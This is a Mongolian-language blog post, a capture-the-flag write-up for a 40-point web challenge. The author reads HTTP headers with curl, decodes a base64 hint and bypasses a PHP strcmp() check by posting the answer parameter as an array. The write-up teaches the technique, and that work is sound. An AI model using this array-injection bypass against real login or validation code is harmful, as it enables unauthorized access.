

  
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="https://www.facebook.com/2008/fbml">

<head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="author" content="Энхээ Осирис">
    <!-- Enable responsive viewport -->
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Bootstrap styles -->
    <link href="/assets/css/bootstrap.min.css" rel="stylesheet">
    <!-- FontAwsome -->
    <link href="/assets/css/font-awesome.min.css" rel="stylesheet">
    <!-- PrimeCSS -->
    <link href="/assets/css/prime.css" rel="stylesheet">
    <!-- Custom font -->
    <link href="https://fonts.googleapis.com/css?family=Tinos:400,400i,700&subset=cyrillic,cyrillic-ext" rel="stylesheet">
    <!-- Custom styles -->
    <link href="/assets/css/style.css?body=1" rel="stylesheet" type="text/css" media="all">
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
      <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>
    <![endif]-->
    <!-- Fav and touch icons -->
    <link rel="shortcut icon" href="/images/favicon.ico">
    <link rel="apple-touch-icon" href="/images/apple-touch-icon.png">
    <link rel="apple-touch-icon" sizes="72x72" href="/images/apple-touch-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="114x114" href="/images/apple-touch-icon-114x114.png">
    <!-- atom & rss feed -->
    <link href="/feed.xml" type="application/rss+xml" rel="alternate" title="Sitewide RSS Feed">
    <!-- Begin Jekyll SEO tag v2.0.0 -->
<title>Толгой 40 оноо - Осирисийн хувийн блог</title>
<meta property="og:title" content="Толгой 40 оноо" />
<meta name="description" content="ӨгөгдөлДаалгаврын нэр: Толгой Хандах хаяг: http://103.48.116.193:8008/ Оноо: 40 оноо " />
<meta property="og:description" content="ӨгөгдөлДаалгаврын нэр: Толгой Хандах хаяг: http://103.48.116.193:8008/ Оноо: 40 оноо " />
<link rel="canonical" href="https://enkhee-Osiris.github.io/information-security/2016/09/23/%D0%A2%D0%BE%D0%BB%D0%B3%D0%BE%D0%B9-40-%D0%BE%D0%BD%D0%BE%D0%BE" />
<meta property="og:url" content="https://enkhee-Osiris.github.io/information-security/2016/09/23/%D0%A2%D0%BE%D0%BB%D0%B3%D0%BE%D0%B9-40-%D0%BE%D0%BD%D0%BE%D0%BE" />
<meta property="og:site_name" content="Осирисийн хувийн блог" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2016-09-23T00:00:00+09:00" />
<script type="application/ld+json">
  {
    "@context": "http://schema.org",
    "@type": "BlogPosting",
    "headline": "Толгой 40 оноо",
    "datePublished": "2016-09-23T00:00:00+09:00",
    "description": "ӨгөгдөлДаалгаврын нэр: Толгой Хандах хаяг: http://103.48.116.193:8008/ Оноо: 40 оноо ",
    "url": "https://enkhee-Osiris.github.io/information-security/2016/09/23/%D0%A2%D0%BE%D0%BB%D0%B3%D0%BE%D0%B9-40-%D0%BE%D0%BD%D0%BE%D0%BE"
  }
</script>
<!-- End Jekyll SEO tag -->
    
        <meta property="fb:admins" content="100003629098903"/>
        <meta property="fb:app_id" content="1184490104906355"/>
    
    
        <meta property="og:image" content="https://cloud.githubusercontent.com/assets/14227502/18790645/29fbb290-81e2-11e6-9fbf-a5650585ba6b.jpg"/>
    
</head>

<body>
    

  
<header class="intro post" 
   
    style="background-image: url(https://cloud.githubusercontent.com/assets/14227502/18790645/29fbb290-81e2-11e6-9fbf-a5650585ba6b.jpg)"
   
  >
  <div class="site-heading col-lg-6 col-lg-offset-3 col-md-8 col-md-offset-2 col-sm-12" 
    >
      
        <div class="tags">
        
          
          
          
            <a href="/blog/tag/haruul-zangi/">
            Харуул Занги</a>
          
        
          
          
          
            <a href="/blog/tag/writeup/">
            Writeup</a>
          
        
          
          
          
            <a href="/blog/tag/web/">
            Вэб</a>
          
        
        </div>
      
      <h1>
        Толгой 40 оноо
      </h1>
      <h3>
        2016 оны
        
        9-р сар
          
        23-нд
        
        
          
            
            
              
                <a href="/blog/category/information-security/">
                Мэдээллийн аюулгүй байдал
                </a>
                ангилалд
              
          
         
        нийтэлсэн.
      </h3>
      <h3 class="eta"></h3>
  </div>
</header>
<!-- Main content -->
<div class="container">
  <div class="post-full col-lg-10 col-lg-offset-1 col-md-10 col-md-offset-1">
    <div class="content">
        <h2 id="section">Өгөгдөл</h2>
<p><strong>Даалгаврын нэр:</strong> Толгой <br />
<strong>Хандах хаяг:</strong> http://103.48.116.193:8008/ <br />
<strong>Оноо:</strong> 40 оноо <br /></p>

<hr />
<p>Энэ даалгаврын хувьд тэмцээний үеэр хийж чадаагүй бөгөөд толгой (Header) дээрээс ямар нэгэн зүйл олохоос өөр санаа байсангүй.</p>

<p>Тэмцээний маргааш нь <a href="https://curl.haxx.se">curl</a> ашиглаж header-үүдийг харж болохыг мэдсэн бөгөөд тугийг олж чадсан юм.</p>

<div class="highlighter-rouge"><pre class="highlight"><code>$ curl -I http://103.48.116.193:8008/
</code></pre>
</div>

<blockquote>
  <p>асуулт 1: Харуул Занги эхний тэмцээн болсон он? /хариултаа илээр явуулна уу. ‘answer_level_one’ /</p>
</blockquote>

<p>гэсэн хариу ирэх бөгөөд илээр гэдэг нь <em>get</em> хүсэлтийг хэлж байна. Харуул занги анхны тэмцээн 2013 онд болсон бөгөөд дахин <code class="highlighter-rouge">curl</code> ашиглаж үзье.</p>

<hr />

<div class="highlighter-rouge"><pre class="highlight"><code>$ curl -I http://103.48.116.193:8008/?answer_level_one=2013
</code></pre>
</div>

<blockquote>
  <p>Найдвар: aDRydVVMLVpAbkcxXzIwMTY= /хариултыг илээр явуулна уу. ‘answer_next_one’/</p>
</blockquote>

<p>Өгөгдсөн <a href="https://en.wikipedia.org/wiki/Base64">base64</a>-г тайлъя.</p>

<div class="highlighter-rouge"><pre class="highlight"><code>$ base64 -D &lt;&lt;&lt; "aDRydVVMLVpAbkcxXzIwMTY="
</code></pre>
</div>

<p><code class="highlighter-rouge">h4ruUL-Z@nG1_2016</code> гэсэн тэмдэгт мөр гарч ирлээ.</p>

<hr />

<div class="highlighter-rouge"><pre class="highlight"><code>$ curl -I http://103.48.116.193:8008/?answer_next_one=h4ruUL-Z@nG1_2016
</code></pre>
</div>
<blockquote>
  <p>Учрыг ол : hint php strcmp() /хариултыг далдаар явуулна уу. ‘answer_level_last_one’/</p>
</blockquote>

<p><a href="http://103.48.116.193:8008/?answer_next_one=h4ruUL-Z@nG1_2016">http://103.48.116.193:8008/?answer_next_one=h4ruUL-Z@nG1_2016</a> хаяг руу хандаж үзвэл input форм харагдана. Өгөгдсөн hint-г уншвал шалгалтаа strcmp() функц ашиглаж хийдэг бололтой. strcmp-г bypass хийхийн тулд тэмдэгт мөр хэлбэрээр хүсэлт явуулахад л болно.</p>

<div class="highlighter-rouge"><pre class="highlight"><code>$ curl -d "answer_level_last_one[]=a" http://103.48.116.193:8008/?answer_next_one=h4ruUL-Z@nG1_2016
</code></pre>
</div>
<blockquote>
  <p>FLAG: HZ{0nly_4rrAy_p4$$_1t}</p>
</blockquote>

<p>Эцэст нь туг: <strong>HZ{0nly_4rrAy_p4$$_1t}</strong></p>

    </div>
    <div id="fb-root"></div>
<script>
  window.fbAsyncInit = function() {
    FB.init({
      appId      : '1184490104906355',
      xfbml      : true,
      version    : 'v2.7'
    });
  };
  (function(d, s, id){
     var js, fjs = d.getElementsByTagName(s)[0];
     if (d.getElementById(id)) {return;}
     js = d.createElement(s); js.id = id;
     js.src = "//connect.facebook.net/en_US/sdk.js";
     fjs.parentNode.insertBefore(js, fjs);
   }(document, 'script', 'facebook-jssdk'));
</script>
<div class="fb-comments" data-href="https://enkhee-Osiris.github.io/information-security/2016/09/23/%D0%A2%D0%BE%D0%BB%D0%B3%D0%BE%D0%B9-40-%D0%BE%D0%BD%D0%BE%D0%BE" data-num-posts="5" data-width="100%" data-colorscheme="light"></div>


  </div>
</div>
    <footer class="blog-footer">
        <p>Crafted with <span style="color: #25ba84">&hearts;</span> by <a href="http://github.com/enkhee-Osiris">Osiris</a>.</p>
        <p>
            <a href="#">Back to top</a>
        </p>
    </footer>
    <div class="navbar">
        <a href="/"><img src="/images/logo_small.png"></a>
        <div class="button_container" id="toggle">
          <span class="top"></span>
          <span class="middle"></span>
          <span class="bottom"></span>
        </div>
    </div>
    
    <div class="overlay" id="overlay">
        <nav class="overlay-menu">
            <ul>
                
                
                  
    
      
    
  
    
      
      	
        	<li><a href="/about/">Миний Тухай</a></li>
      	
      
    
  
    
  
    
      
      	
        	<li><a href="/">Hello World!</a></li>
      	
      
    
  
    
  
            </ul>
        </nav>
        <div class="social-icons">
            <ul>
                <li><a href="http://facebook.com/Ag.Enkhee"><i class="fa fa-facebook-square" aria-hidden="true"></i></a></li>
                <li><a href="http://lodrosiris.tumblr.com/"><i class="fa fa-tumblr-square" aria-hidden="true"></i></a></li>
                <li><a href="http://plus.google.com/enkhee-Osiris"><i class="fa fa-google-plus-square" aria-hidden="true"></i></a></li>
                <li><a href="http://github.com/enkhee-Osiris"><i class="fa fa-github-square" aria-hidden="true"></i></a></li>
                <li><a href="mailto:enkhee.ag@gmail.com"><i class="fa fa-envelope-square" aria-hidden="true"></i></a></li>
                <li><a href="http://https://enkhee-Osiris.github.io/feed.xml"><i class="fa fa-rss-square" aria-hidden="true"></i></a></li>
            </ul>
        </div>
    </div>
    <script type="text/javascript">
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-80597159-1']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
</script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
    <script src="/assets/js/flowtype.js"></script>
    <script src="/assets/js/readingTime.js"></script>
    <script src="/assets/js/prime.js"></script>
    <script>
    $('#toggle').click(function() {
        $(this).toggleClass('active');
        $('#overlay').toggleClass('open');
    });
    $(document).ready(function(){
        /*
            Reading Time in post
         */
        $('.content').readingTime({
            wordsPerMinute: 250,
            lang: 'mn',
            error: function(message) {
                console.log(message);
            }
        });

        /*
            For articles
         */
        var isTouchDevice = 'ontouchstart' in document.documentElement;
        if (isTouchDevice)
            return;
        var $container = $(".blogs");
        if (!$container.length)
            return;
        var $headers = $container.find("h2");
        var originalPosition = $headers.css("position");
        var originalTop = $headers.css("top");
        var headerHeight;
        var headerOffsets;
        var lastHeader;
        var containerBottom;
        $(document).scroll(moveHeaders);
        $(window).resize(setUp);
        setUp();

        function setUp() {
            headerHeight = $headers.height();
            containerBottom = $container.offset().top + $container.height() - headerHeight;
            headerOffsets = $headers.map(function() {
                return {
                    header: this,
                    offset: $(this).offset().top
                };
            });
            moveHeaders();
        }

        function headerForX(x) {
            var thisHeader;
            var nextOffset;
            headerOffsets.each(function() {
                if (this.offset < x) {
                    thisHeader = this.header;
                } else {
                    nextOffset = nextOffset || this.offset;
                }
            });
            if (thisHeader) {
                nextOffset = nextOffset || containerBottom;
                thisHeader.nextOffset = nextOffset;
            }
            return thisHeader;
        }

        function moveHeaders() {
            var pos = $(document).scrollTop();
            var header = headerForX(pos);
            if (lastHeader && lastHeader != header) {
                $(lastHeader).css({
                    position: originalPosition,
                    top: originalTop,
                    opacity: 1.0
                });
                lastHeader = null;
            }
            if (header) {
                var opacity = 1.0;
                var fullAt = header.nextOffset - headerHeight;
                if (pos > fullAt) {
                    opacity = 1 - (pos - fullAt) / headerHeight;
                }
                $(header).css({
                    position: "fixed",
                    top: 0,
                    opacity: opacity
                });
                lastHeader = header;
            }
        }
    });
    </script>
</body>

</html>

